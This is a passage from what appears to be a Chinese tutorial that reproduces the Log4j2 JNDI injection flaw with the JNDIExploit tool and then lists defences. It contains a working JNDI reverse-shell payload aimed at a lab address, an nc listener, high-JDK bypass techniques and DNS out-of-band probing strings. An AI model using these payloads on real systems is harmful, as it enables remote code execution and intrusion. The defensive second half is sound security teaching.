Payload类型详解在JNDIExploit的路径中我们使用了/Basic/Command/Base64/。它支持多种模式/Basic/Command/Base64/[base64_cmd]最直接的命令执行。将Base64编码的系统命令写入一个临时脚本文件并执行。适用于Linux/Unix系统。/Basic/Command/[raw_cmd]直接执行原始命令需进行URL编码。但包含特殊字符时容易出错Base64更稳定。/ReverseShell/[attack_ip]/[port]反弹Shell。这是更高级的利用方式。它会让目标服务器主动连接攻击机指定的IP和端口从而获得一个交互式的命令行Shell。例如${jndi:ldap://192.168.111.128:1389/ReverseShell/192.168.111.128/4444}。攻击机需要先用nc -lvp 4444监听4444端口。/TomcatBypass/...针对运行在Tomcat等特定容器环境下由于类加载器隔离导致无法直接加载恶意类的情况提供了绕过方式。/GroovyBypass/...利用Groovy脚本引擎执行命令适用于高版本JDK对JNDI注入的某些限制。/WeblogicBypass/...针对WebLogic中间件环境的特殊利用链。选择Payload的策略内网探测先用/Basic/Command/Base64/执行ping或curl命令探测内网其他主机。获取立足点使用/ReverseShell/获取一个稳定的交互式Shell方便后续操作。环境适配如果基础命令执行成功但反弹Shell失败可能是目标环境网络出站受限或者nc命令不存在。此时可以尝试先上传一个nc二进制文件或者使用其他脚本语言如Python、Perl的反弹Shell命令。5.2 绕过JDK高版本限制从JDK 8u191、11.0.1等版本开始Oracle增加了com.sun.jndi.ldap.object.trustURLCodebase系统属性默认设置为false这阻止了JNDI从远程Codebase即我们的HTTP服务器加载工厂类直接扼杀了经典的利用链。但这并非绝对安全。JNDIExploit集成了一些绕过技巧利用本地ClassPath中的类如果目标ClassPath中存在某些具有危险方法的类如org.apache.naming.factory.BeanFactory配合javax.el.ELProcessor攻击者可以通过LDAP引用指向这些已有的类并传递恶意参数同样可以达到代码执行的效果。这需要目标应用依赖了特定的第三方库。利用其他Lookup/协议Log4j2除了jndi还有其他Lookup如ctx、main、sys等。虽然它们不如JNDI直接但在某些特定上下文或与其他漏洞结合时可能有用。JNDIExploit主要专注于JNDI利用链。在实际攻击中攻击者会先探测目标Java版本然后选择合适的Payload路径。对于vCenter其内置的JDK版本通常是固定的需要根据VMware官方公告确认其受影响的JDK版本范围。5.3 漏洞探测与指纹识别在真正的攻击中攻击者不会盲目发送攻击Payload。他们会先进行探测确认目标是否存在漏洞以及可能的环境信息。DNS外带探测这是最安全、最隐蔽的探测方式。Payload使用${jndi:dns://dnslog.cn/xxx}。如果目标存在漏洞它会向dnslog.cn这样的DNS日志平台发起一次DNS查询攻击者只需查看该平台是否有自己子域名的查询记录即可确认漏洞而不会触发命令执行。JNDIExploit也支持启动一个DNS服务来接收这种探测。延时盲测构造Payload执行sleep 5这样的命令通过观察响应时间是否延迟来判断。错误信息判断向不存在的LDAP服务器发送请求观察应用是否返回与JNDI连接相关的错误信息如“Connection refused”这也能间接提示漏洞存在。6. 防御视角从复现中学到的防护要点通过这次完整的攻击复现我们站在攻击者的角度摸清了整个流程。现在切换回防御者视角这些知识能直接转化为有效的防御策略紧急缓解措施立竿见影设置系统属性在Java应用的启动参数中添加-Dlog4j2.formatMsgNoLookupstrueLog4j 2.10及以上或-Dlog4j2.formatMsgNoLookupstrue。这是漏洞爆发初期最快速的全局缓解方案。移除漏洞类直接删除Log4j-core JAR包中的JndiLookup类文件。这是最彻底的方法但可能影响某些依赖该类的功能。zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class网络层控制在防火墙或主机安全策略上严格限制服务器出站连接。禁止内部服务器主动向外部未知地址的LDAP389, 636, 1389等、RMI1099、HTTP/HTTPS等端口发起连接。这是阻断攻击链第3、4步的最有效手段之一。根本解决方案升级升级升级将Log4j2组件升级到安全版本2.17.0及以上截至我知识截止日期2.17.1是推荐版本。这是唯一一劳永逸的方法。对于vCenter必须严格按照VMware官方发布的安全公告和升级指南进行操作。供应链安全扫描在CI/CD流程中引入SCA软件成分分析工具持续扫描项目依赖及时发现并告警存在已知漏洞的组件。纵深防御与监控WAF/IPS规则部署Web应用防火墙或入侵防御系统配置规则以拦截包含${jndi:、${ctx:、${sys:等模式的请求。但要注意攻击者可能会使用各种转义、编码如URL编码、Base64编码进行绕过。主机安全监控在服务器上部署HIDS主机入侵检测系统监控异常进程创建如突然启动bash、sh、powershell、可疑网络外连尤其是向非常用端口的连接以及敏感目录的文件创建如/tmp下新增可执行文件。日志审计与分析集中收集和分析应用日志、系统日志。搜索日志中是否出现了异常的JNDI字符串模式。虽然攻击成功意味着日志可能已被记录但及时的日志分析有助于发现攻击尝试和追溯攻击源头。安全开发规范输入验证与过滤对所有用户输入进行严格的验证和过滤特别是在记录日志之前。但这种方式容易遗漏不应作为主要防御手段。最小权限原则运行Java应用的账户应遵循最小权限原则避免使用root或高权限账户。这样即使被攻破攻击者能造成的破坏也有限。复现漏洞的意义绝不止于“炫技”。它是一次深刻的攻防演练。当你亲手走通攻击者的每一步你才能真正理解防御阵地的每一个薄弱点应该加固在哪里。对于Log4j2这样的“史诗级”漏洞修复和防御是一个系统工程需要从开发、部署、运维到监控的全流程参与。希望这次从攻击者视角出发的旅程能让你在构建更安全系统的道路上又多了一份笃定和清晰。
